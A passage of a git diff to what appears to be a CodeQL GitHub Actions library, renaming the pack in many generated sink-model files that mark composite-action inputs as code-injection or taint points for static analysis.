@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["crunchydata/postgres-operator", "*", "input.k3s-channel", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml index 843e0d20b98a..75b744fc036b 100644 --- a/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml +++ b/ql/lib/ext/generated/composite-actions/cvc5_cvc5.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["cvc5/cvc5", "*", "input.build-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml index 2a0fd3ac371d..7a4ea3514ba4 100644 --- a/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml +++ b/ql/lib/ext/generated/composite-actions/d2l-ai_d2l-en.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["d2l-ai/d2l-en", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml index 3ef29cc9b84f..25a25d085ad1 100644 --- a/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/danysk_build-check-deploy-gradle-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["danysk/build-check-deploy-gradle-action", "*", "input.clean-command", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml index 71d2012eb029..23bd58d66cba 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-dotnet", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml index a67aeb905958..1849ad0e2f56 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-go.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-go", "*", "input.files", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml index 1f5dd108f910..c4861c77842b 100644 --- a/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml +++ b/ql/lib/ext/generated/composite-actions/datadog_dd-trace-js.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datadog/dd-trace-js", "*", "input.container-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml index ea4a2a2a3c76..b11931b54086 100644 --- a/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/datafuselabs_databend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["datafuselabs/databend", "*", "input.dataset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml index 29973ccdbd74..1b3fffbe8693 100644 --- a/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml +++ b/ql/lib/ext/generated/composite-actions/davatorium_rofi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["davatorium/rofi", "*", "input.logfile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml index 2db70ffea663..df6f6088087d 100644 --- a/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml +++ b/ql/lib/ext/generated/composite-actions/debezium_debezium.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["debezium/debezium", "*", "input.path-core", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml index 8a4273e8cafd..89c10bd95c22 100644 --- a/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml +++ b/ql/lib/ext/generated/composite-actions/defenseunicorns_zarf.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["defenseunicorns/zarf", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml index de09b35f1d46..4a471b5a97cf 100644 --- a/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml +++ b/ql/lib/ext/generated/composite-actions/demarches-simplifiees_demarches-simplifiees.fr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["demarches-simplifiees/demarches-simplifiees.fr", "*", "input.results_path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml index 91e6268e6140..9f2448a6d752 100644 --- a/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml +++ b/ql/lib/ext/generated/composite-actions/department-of-veterans-affairs_vets-website.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["department-of-veterans-affairs/vets-website", "*", "input.delimiter", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml index 777212d9a0a6..dc8a362dc964 100644 --- a/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/devexpress_devextreme.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["devexpress/devextreme", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml index 8cc0ab83a420..a1f2ccb164e7 100644 --- a/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml +++ b/ql/lib/ext/generated/composite-actions/diggerhq_digger.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["diggerhq/digger", "*", "input.checkov-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml index f1244bdd5dec..303f9d56cb22 100644 --- a/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml +++ b/ql/lib/ext/generated/composite-actions/diku-dk_futhark.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["diku-dk/futhark", "*", "input.script", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml index 37814510c8c4..2f28cf86431c 100644 --- a/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml +++ b/ql/lib/ext/generated/composite-actions/discourse_.github.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["discourse/.github", "*", "input.about_json_path", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml index 48e40c36beaa..efbcceb48f56 100644 --- a/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml +++ b/ql/lib/ext/generated/composite-actions/dnsjava_dnsjava.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dnsjava/dnsjava", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml index 0edb2c5f8cdc..649fac9fede6 100644 --- a/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotintent_react-native-ble-plx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotintent/react-native-ble-plx", "*", "input.REACT_NATIVE_VERSION", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml index 61210d17abb9..3623fe51e843 100644 --- a/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_docs-tools.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotnet/docs-tools", "*", "input.support", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml index 22dc1a406293..d730cdb6a990 100644 
--- a/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml +++ b/ql/lib/ext/generated/composite-actions/dotnet_dotnet-monitor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dotnet/dotnet-monitor", "*", "input.files_to_commit", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml index b2888b571a8a..bcec913ef7c5 100644 --- a/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml +++ b/ql/lib/ext/generated/composite-actions/dragonflydb_dragonfly.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["dragonflydb/dragonfly", "*", "input.gspace-secret", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml index bc188d91f1bb..ad5ec2e544fc 100644 --- a/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml +++ b/ql/lib/ext/generated/composite-actions/drawpile_drawpile.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["drawpile/drawpile", "*", "input.cache_key", "output.cache_key", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml index d5defe67401e..9c5c38007bc3 100644 --- a/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml +++ b/ql/lib/ext/generated/composite-actions/eksctl-io_eksctl.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eksctl-io/eksctl", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml index d97fedbed130..8899c0563e8e 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-dotnet.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-dotnet", "*", "input.project", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml index e22c29b09f11..f71c818a337e 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-agent-java.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elastic/apm-agent-java", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml index 7203bb8345c6..989eca719606 100644 --- a/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml +++ b/ql/lib/ext/generated/composite-actions/elastic_apm-server.model copy.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["elastic/apm-server", "*", "input.version", "output.release-version", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml index dcfbb0ea2032..2666233ac877 100644 --- a/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml +++ b/ql/lib/ext/generated/composite-actions/elementor_elementor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["elementor/elementor", "*", "input.README_TXT_PATH", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml index 6c5d6edd572c..e8aa6be8fa6a 100644 --- a/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml +++ b/ql/lib/ext/generated/composite-actions/emberjs_data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["emberjs/data", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml index fdaee61066ed..9bd167413532 100644 --- a/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml +++ b/ql/lib/ext/generated/composite-actions/emqx_emqx.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["emqx/emqx", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml index d68c4e57c8ad..3c50e297eb5e 100644 --- a/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml +++ b/ql/lib/ext/generated/composite-actions/eonasdan_tempus-dominus.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["eonasdan/tempus-dominus", "*", "input.VERSION", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml index 85a8d2f4d65d..d1c181a87075 100644 --- a/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml +++ b/ql/lib/ext/generated/composite-actions/erlang_otp.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["erlang/otp", "*", "input.TYPE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml index d22754092787..5b600a4cad42 100644 --- a/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml +++ b/ql/lib/ext/generated/composite-actions/esphome_esphome.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["esphome/esphome", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml index 4dc0b87214b3..65fdcb11a008 100644 --- a/ql/lib/ext/generated/composite-actions/expensify_app.model.yml +++ b/ql/lib/ext/generated/composite-actions/expensify_app.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expensify/app", "*", "input.GPG_PASSPHRASE", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml index ea1a8a8afecb..08c3ff9cf438 100644 
--- a/ql/lib/ext/generated/composite-actions/expo_expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/expo", "*", "input.ndk-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml index 5ce00c29e52b..c06978549fb9 100644 --- a/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml +++ b/ql/lib/ext/generated/composite-actions/expo_vscode-expo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["expo/vscode-expo", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml index d1f551b66da3..eaca3fb9c62b 100644 --- a/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml +++ b/ql/lib/ext/generated/composite-actions/external-secrets_external-secrets.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["external-secrets/external-secrets", "*", "input.image-tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml index 6f8845ec1c0a..e1c608d3e105 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_buck2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/buck2", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml index 152fdfed4477..dc1f7a7b3b88 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_flow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/flow", "*", "input.arch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml index 5919ade7e819..a80ce46abc59 100644 --- a/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebook_yoga.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebook/yoga", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml index d9afa5bb21fe..15886c2c945d 100644 --- a/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml +++ b/ql/lib/ext/generated/composite-actions/facebookresearch_xformers.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["facebookresearch/xformers", "*", "input.arch", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml index 0b36853a8914..45769a727d8b 100644 --- a/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/fastly_compute-actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fastly/compute-actions", "*", "input.fastly-api-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml index 2bd521d42f58..9f85415a4825 100644 --- a/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml +++ b/ql/lib/ext/generated/composite-actions/felangel_bloc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["felangel/bloc", "*", "input.coverage_excludes", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml index 8ae81e706a42..bbfb20551afc 100644 --- a/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/firebase_firebase-ios-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["firebase/firebase-ios-sdk", "*", "input.min-ios-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml index 4893772b71ae..f8dc63ee029e 100644 
--- a/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml +++ b/ql/lib/ext/generated/composite-actions/flagsmith_flagsmith.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["flagsmith/flagsmith", "*", "input.aws_ecr_repository_arn", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml index e174c830a855..5ad65dcc0bdb 100644 --- a/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml +++ b/ql/lib/ext/generated/composite-actions/flaxengine_flaxengine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flaxengine/flaxengine", "*", "input.vulkan-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml index 14070215bfa3..90b6b38b6b01 100644 --- a/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml +++ b/ql/lib/ext/generated/composite-actions/flipperdevices_flipperzero-firmware.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["flipperdevices/flipperzero-firmware", "*", "input.firmware-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml index f3a0b47f2c2c..4f1157d862ae 100644 --- a/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml +++ b/ql/lib/ext/generated/composite-actions/fluxcd_flux2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fluxcd/flux2", "*", "input.bindir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml index 12011d643963..b8ded477dd2f 100644 --- a/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml +++ b/ql/lib/ext/generated/composite-actions/forcedotcom_salesforcedx-vscode.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["forcedotcom/salesforcedx-vscode", "*", "input.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml index 40ecb17610eb..87ae2f5d614f 100644 --- a/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml +++ b/ql/lib/ext/generated/composite-actions/fossasia_visdom.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["fossasia/visdom", "*", "input.loadprbuild", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml index 250606588f98..0cfd7be68a34 100644 --- a/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/freckle_stack-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freckle/stack-action", "*", "input.find-options", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml index f2f5678b8b8a..54a05620d902 100644 --- a/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/freeradius_freeradius-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["freeradius/freeradius-server", "*", "input.gcc_ver", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml index b17eb01f8217..e16f3fc74b3f 100644 --- a/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml +++ b/ql/lib/ext/generated/composite-actions/gaphor_gaphor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["gaphor/gaphor", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml index 7ebdde766f3d..a3f692e7d2f3 100644 --- a/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml +++ b/ql/lib/ext/generated/composite-actions/getsentry_action-release.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["getsentry/action-release", "*", "input.working_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml b/ql/lib/ext/generated/composite-actions/github_codeql-action.model.yml index 